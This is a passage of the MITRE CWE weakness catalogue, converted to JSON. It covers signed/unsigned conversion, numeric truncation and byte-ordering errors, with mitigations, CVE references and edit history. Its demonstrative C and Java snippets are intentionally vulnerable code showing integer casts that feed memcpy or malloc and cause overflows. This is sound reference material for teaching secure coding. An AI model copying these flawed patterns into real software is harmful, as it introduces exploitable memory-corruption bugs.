Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations, References"}],"Previous_Entry_Name":[{"#text":"Sign Extension Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Sign Extension","attr":{"@_Date":"2008-11-24"}}]}},"195":{"attr":{"@_ID":"195","@_Name":"Signed to Unsigned Conversion Error","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a signed primitive and performs a cast to an unsigned primitive, which can produce an unexpected value if the value of the signed primitive can not be represented using an unsigned primitive.","Extended_Description":{"xhtml:p":["It is dangerous to rely on implicit casts between signed and unsigned numbers because the result can take on an unexpected value and violate assumptions made by the program.","Often, functions will return negative values to indicate a failure. When the result of a function is to be used as a size parameter, using these negative return values can have unexpected results. For example, if negative size values are passed to the standard memory copy or allocation functions they will be implicitly cast to a large unsigned value. This may lead to an exploitable buffer overflow or underflow condition."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"Conversion between signed and unsigned values can lead to a variety of errors, but from a security standpoint is most commonly associated with integer overflow and buffer overflow vulnerabilities."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-73"},"Intro_Text":"In this example the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned int, amount will be implicitly converted to unsigned.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int readdata () {}","xhtml:div":{"#text":"int amount = 0;...if (result == ERROR)amount = -1;...return amount;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},"Body_Text":"If the error condition in the code above is met, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers."},{"attr":{"@_Demonstrative_Example_ID":"DX-74"},"Intro_Text":"In this example, depending on the return value of accecssmainframe(), the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned value, amount will be implicitly cast to an unsigned number.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned int readdata () {}","xhtml:div":{"#text":"int amount = 0;...amount = accessmainframe();...return amount;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}},"Body_Text":"If the return value of accessmainframe() is -1, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers."},{"attr":{"@_Demonstrative_Example_ID":"DX-21"},"Intro_Text":"The following code is intended to read an incoming packet from a socket and extract one or more headers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"DataPacket *packet;int numHeaders;PacketHeader *headers;sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet->headers;if (numHeaders > 100) {}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers);","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"ExitError(\\"too many headers!\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow."},{"Intro_Text":"This example processes user input comprised of a series of variable-length structures. The first 2 bytes of input dictate the size of the structure to be processed.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* processNext(char* strm) {}","xhtml:div":{"#text":"char buf[512];short len = *(short*) strm;strm += sizeof(len);if (len <= 512) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"memcpy(buf, strm, len);process(buf);return strm + len;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"return -1;","attr":{"@_style":"margin-left:10px;"}}]}}},"Body_Text":"The programmer has set an upper bound on the structure size: if it is larger than 512, the input will not be processed. The problem is that len is a signed short, so the check against the maximum structure length is done with signed values, but len is converted to an unsigned integer for the call to memcpy() and the negative bit will be extended to result in a huge value for the unsigned integer. If len is negative, then it will appear that the structure has an appropriate size (the if branch will be taken), but the amount of memory copied by memcpy() will be quite large, and the attacker will be able to overflow the stack with data in strm."},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"attr":{"@_Demonstrative_Example_ID":"DX-138"},"Intro_Text":"This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function\'s action.","Example_Code":{"#text":"int proc_msg(char *s, int msg_len){}char *s = \\"preamble: message\\\\n\\";char *sl = strchr(s, \':\'); // Number of characters up to \':\' (not including space)int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero lengthint ret_val = proc_msg (\\"s\\", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"int pre_len = sizeof(\\"preamble: \\");char buf[pre_len - msg_len];","xhtml:i":["// Note space at the end of the string - assume all strings have preamble with space","... Do processing here if we get this far"],"xhtml:br":["","",""]}},"Body_Text":"The buffer length ends up being -1, resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller\'s calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Signed to unsigned conversion error"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Specific"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Type Conversions", Page 223"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, References"}]}},"196":{"attr":{"@_ID":"196","@_Name":"Unsigned to Signed Conversion Error","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses an unsigned primitive and performs a cast to a signed primitive, which can produce an unexpected value if the value of the unsigned primitive can not be represented using a signed primitive.","Extended_Description":"Although less frequent an issue than signed-to-unsigned conversion, unsigned-to-signed conversion can be the perfect precursor to dangerous buffer underwrite conditions that allow attackers to move down the stack where they otherwise might not have access in a normal buffer overflow condition. Buffer underwrites occur frequently when large unsigned values are cast to signed values, and then used as indexes into a buffer or for pointer arithmetic.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"124","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"120","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Incorrect sign conversions generally lead to undefined behavior, and therefore crashes."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If a poor cast lead to a buffer overflow or similar condition, data integrity may be affected."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"Improper signed-to-unsigned conversions without proper checking can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Choose a language which is not subject to these casting flaws."},{"Phase":"Architecture and Design","Description":"Design object accessor functions to implicitly check values for valid sizes. Ensure that all functions which will be used as a size are checked previous to use as a size. If the language permits, throw exceptions rather than using in-band errors."},{"Phase":"Implementation","Description":"Error check the return values of all functions. Be aware of implicit casts made, and use unsigned variables for sizes if at all possible."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Unsigned to signed conversion error"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"92"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Type Conversions", Page 223"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}]}},"197":{"attr":{"@_ID":"197","@_Name":"Numeric Truncation Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Truncation errors occur when a primitive is cast to a primitive of a smaller size and data is lost in the conversion.","Extended_Description":"When a primitive is cast to a smaller primitive, the high order bits of the large value are lost in the conversion, potentially resulting in an unexpected value that is not equal to the original value. This value may be required as an index into a buffer, a loop iterator, or simply necessary state data. In any case, the value cannot be trusted and the system will be in an undefined state. While this method may be employed viably to isolate the low bits of a value, this usage is rare, and truncation usually implies that an implementation error has occurred.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"195","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"196","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"192","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"194","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Memory","Note":"The true value of the data is lost and corrupted data is used."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that no casts, implicit or explicit, take place that move from a larger size primitive or a smaller size primitive."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example, while not exploitable, shows the possible mangling of values associated with truncation errors:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int intPrimitive;short shortPrimitive;intPrimitive = (int)(~((int)0) ^ (1 << (sizeof(int)*8-1)));shortPrimitive = intPrimitive;printf(\\"Int MAXINT: %d\\\\nShort MAXINT: %d\\\\n\\", intPrimitive, shortPrimitive);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"Int MAXINT: 2147483647Short MAXINT: -1","xhtml:br":""}}],"Body_Text":["The above code, when compiled and run on certain systems, returns the following output:","This problem may be exploitable when the truncated value is used as an array index, which can happen implicitly when 64-bit values are used as indexes, as they are truncated to 32 bits."]},{"Intro_Text":"In the following Java example, the method updateSalesForProduct is part of a business application class that updates the sales information for a particular product. The method receives as arguments the product ID and the integer amount sold. The product ID is used to retrieve the total product count from an inventory object which returns the count as an integer. Before calling the method of the sales object to update the sales count the integer values are converted to The primitive type short since the method requires short type for the method arguments.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...public void updateSalesForProduct(String productID, int amountSold) {}...","xhtml:br":["","",""],"xhtml:i":"// update sales database for number of product sold with product ID","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int productCount = inventory.getProductCount(productID);short count = (short) productCount;short sold = (short) amountSold;sales.updateSalesCount(productID, count, sold);","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get the total number of products in inventory database","// convert integer values to short, the method for the","// sales object requires the parameters to be of type short","// update sales database for product"]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"...public void updateSalesForProduct(String productID, int amountSold) {}...","xhtml:br":["","",""],"xhtml:i":"// update sales database for number of product sold with product ID","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int productCount = inventory.getProductCount(productID);if ((productCount < Short.MAX_VALUE) && (amountSold < Short.MAX_VALUE)) {else {}","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get the total number of products in inventory database","// make sure that integer numbers are not greater than","// maximum value for type short before converting","// throw exception or perform other processing"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"short count = (short) productCount;short sold = (short) amountSold;sales.updateSalesCount(productID, count, sold);","xhtml:br":["","","","","","",""],"xhtml:i":["// convert integer values to short, the method for the","// sales object requires the parameters to be of type short","// update sales database for product"]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":"However, a numeric truncation error can occur if the integer values are higher than the maximum value allowed for the primitive type short. This can cause unexpected results or loss or corruption of data. In this case the sales database may be corrupted with incorrect data. Explicit casting from a from a larger size primitive type to a smaller size primitive type should be prevented. The following example an if statement is added to validate that the integer values less than the maximum value for the primitive type short before the explicit cast and the call to the sales method."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-0231","Description":"Integer truncation of length value leads to heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0231"},{"Reference":"CVE-2008-3282","Description":"Size of a particular type changes for 64-bit platforms, leading to an integer truncation in document processor causes incorrect index to be generated.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3282"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Numeric truncation error"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Truncation error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO34-C","Entry_Name":"Distinguish between characters read from a file and EOF or WEOF","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP34-C","Entry_Name":"Ensure that floating point conversions are within range of the new type","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT02-C","Entry_Name":"Understand integer conversion rules"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT05-C","Entry_Name":"Do not use input functions to convert character data if they cannot handle all possible inputs"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"NUM12-J","Entry_Name":"Ensure conversions of numeric types to narrower types do not result in lost or misinterpreted data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Truncation", Page 259"}}},"Notes":{"Note":{"#text":"This weakness has traditionally been under-studied and under-reported, although vulnerabilities in popular software have been published in 2008 and 2009.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Observed_Examples, Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"198":{"attr":{"@_ID":"198","@_Name":"Use of Incorrect Byte Ordering","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not account for byte ordering (e.g. big-endian and little-endian) when processing the input, causing an incorrect number or value to be used.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"188","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Detection_Methods":{"Detection_Method":{"Method":"Black Box","Description":"Because byte ordering bugs are usually very noticeable even with normal inputs, this bug is more likely to occur in rarely triggered error conditions, making them difficult to detect using black box methods."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Numeric Byte Ordering Error"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO12-J","Entry_Name":"Provide methods to read and write little-endian data"}]},"Notes":{"Note":{"#text":"Under-reported.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Detection_Factors, Relationships, Research_Gaps, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}],"Previous_Entry_Name":{"#text":"Numeric Byte Ordering Error","attr":{"@_Date":"2008-04-11"}}}},"200":{"attr":{"@_ID":"200","@_Name":"Exposure of Sensitive Information to an Unauthorized Actor","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.","Extended_Description":{"xhtml:p":["There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the 